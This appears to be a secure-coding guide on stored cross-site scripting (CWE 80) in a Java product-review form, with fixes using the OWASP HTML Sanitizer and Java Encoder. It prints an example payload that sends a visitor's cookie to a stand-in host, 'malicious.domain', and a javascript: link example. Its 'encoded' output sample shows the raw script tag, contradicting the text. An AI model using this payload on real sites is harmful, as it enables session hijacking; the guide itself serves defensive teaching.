Skip to main content

CWE 80: CROSS-SITE SCRIPTING

Flaw

CWE 80: Cross-Site Scripting (XSS) is a flaw that permits malicious users to execute unauthorized browser scripts in your users' browser. In an XSS attack, attackers identify or discover controls that would enable them to inject scripts into the HTML page via script tags, attributes, and other paths. This is commonly achieved via input sources such as web forms, cookies, and headers. XSS attacks can be made persistent by getting your application to store the malicious content (e.g. in a database or key-value store) for later display.

For example:

<h2>Enter your review:</h2>
    <form name="ratingForm">
        <label>Your Rating (1-5 stars):</label>
        <input type="text" name="stars">
        <label>Details:</label>
        <input type="text" name="details">
        <input type="submit" formaction="/submitReview" value="Submit">
    </form>

This form provides the user with two ways to send data to the application. Users enter their rating in stars and some details, then click the submit button. The Java web application adds this data to a new Review object.

public void setStars(int stars) {
    this.stars = stars;
}

public void setDetails(String details) {
    this.details = details;
}

int myStars = request.getParameter(stars);
String myDetails = new String(request.getParameter(details));

Review myReview = new Review();
myReview.setStars(myStars);
myReview.setDetails(myDetails);

product.addReview(myReview);

After the form is submitted and processed, the product's new review appears on a "See Reviews" page, visible to all users. The HTML on that page renders information from the review:

<script>
document.getElementById("stars").innerHTML = stars;
document.getElementById("details").innerHTML = details;
</script>
...
<p>This item has <span id="stars"></span> stars:</p>
<div id="details"></div>

The page will display any data that the user supplied in the review. When the browser renders the page, it cannot infer whether any elements came from malicious sources -- it simply renders the contents of the source.

For example, if a user submits the following review details:

<script>document.location='http://malicious.domain/attackscripts/stealUserCookie.js?'+document.cookie</script>

This would result in the following HTML:

<p>This item has <span id="stars">5</span> stars:</p>
<div id="details"><script>document.location='http://malicious.domain/attackscripts/stealUserCookie.js?'+document.cookie</script></div>

When a user visits the page, the script will run and redirect the browser to the malicious URL.

In this case, stealUserCookie.js is a remotely-hosted script that will take the user's cookie -- available to JavaScript by default -- and pass it to an attacker. The cookie will likely allow them to hijack the visiting user's session, and could contain several additional pieces of data that would benefit the attacker. This is only one of many attacks that are possible if you have an XSS flaw.

By unexpectedly injecting malicious scripts into sources of user input, an attacker can use your web application to attack your users.

NB: the stars field isn't vulnerable to XSS because setStars() only accepts an int, which means an attacker can't successfully submit a script.

It is not just <script> tags that are vulnerable! <a href='javascript:alert("XSS");'> and other similar malicious entries work just fine. You can have XSS anywhere where untrusted input is being included in an HTML page.

Fix

To prevent Cross-Site Scripting, you must ensure that your application correctly handles any untrusted data before outputting it to users. There are several ways to accomplish this, but the two most common are to sanitize the application's HTML or to contextually escape the data.

In Java, you can use the OWASP Java HTML Sanitizer ↪ to define which HTML elements or attributes are allowed in user input. This enables the user to continue using certain tags (to format text, for example) but will effectively block other, unwanted content.

The sanitization policy is then defined in the Java code. Perhaps we only want to permit the tags p, ul, ol, li, b, i, and a; and we also want to make sure links (<a href=...) only allow http, https, and mailto links. Then we would do something like:

private final HtmlPolicyBuilder DetailsPolicyBuilder = new HtmlPolicyBuilder()
    .allowElements("p", "ul", "ol", "li", "b", "i", "a")
    .allowStandardUrlProtocols()               // http, https, and mailto
    .allowAttributes("href").onElements("a");  // a tags can have an href element

The sanitizeHTML method can then be applied to any untrusted data to render it safe for display. Here, it is applied to the review:

+
+private final HtmlPolicyBuilder DetailsPolicyBuilder = new HtmlPolicyBuilder()
+    .allowElements("p", "ul", "ol", "li", "b", "i", "a")
+    .allowStandardUrlProtocols()               // http, https, and mailto
+    .allowAttributes("href").onElements("a");  // a tags can have an href element
+
 public void setStars(int stars) {
    this.stars = stars;
 }
 
 public void setDetails(String details) {
-   this.details = details;
+   this.details = DetailsPolicyBuilder.toFactory().sanitize(details);
 }
 
 int myStars = request.getParameter(stars);
view fixed code only

This approach renders the HTML safe for display. The sanitizer permits only the elements and attributes listed above, and throws away anything that doesn't fit, including malicious JavaScript tags and URLs. It's generally not necessary to encode numerical data types, so the method is not applied to stars. (Note: depending on the architecture of your application, it may be preferable to apply the sanitization at a different point in the data flow).

A second approach is to encode data for the context in which it will be displayed. Encoding transforms the characters that function as syntax in the destination context (HTML, JavaScript, etc.) into versions that appear the same on-screen, but will not be parsed as syntax. For example, to encode data for HTML output replaces characters like < and > -- characters with special meanings in HTML documents -- with equivalent sequences that cannot change the structure of the surrounding context.

NB: the < and > characters aren't the only ones that need encoding. Be sure to use a well-tested HTML-encoding library instead of just String.replaceAll()

In Java, you can use the OWASP Java Encoder ↪ within your templates to prepare untrusted data for output. Here is the JavaScript from the same template as before, modified to use this library:

document.getElementById("stars").innerHTML = stars;
-  document.getElementById("details").innerHTML = details;
+  document.getElementById("details").innerHTML = <%= Encode.forHtmlContent(details) %>;
view fixed code only

If the attacker were to attempt to run the same payload as before, here is how it would appear in the final document:

<td>Review #1</td>
<td>Evil User</td>
<td><script>document.location='http://malicious.domain/attackscripts/stealUserCookie.js?'+document.cookie</script></td>

The browser correctly interprets &#x3C;script&#x3E; as text to render rather than tags to interpret, so the script will not run. Instead, the literal text as submitted appears as the output. Using this approach with a method selected for the right context (forHtmlAttribute, forJavaScriptBlock, etc.) can prevent a wide range of XSS attacks.

References

CWE ↪OWASP ↪WASC ↪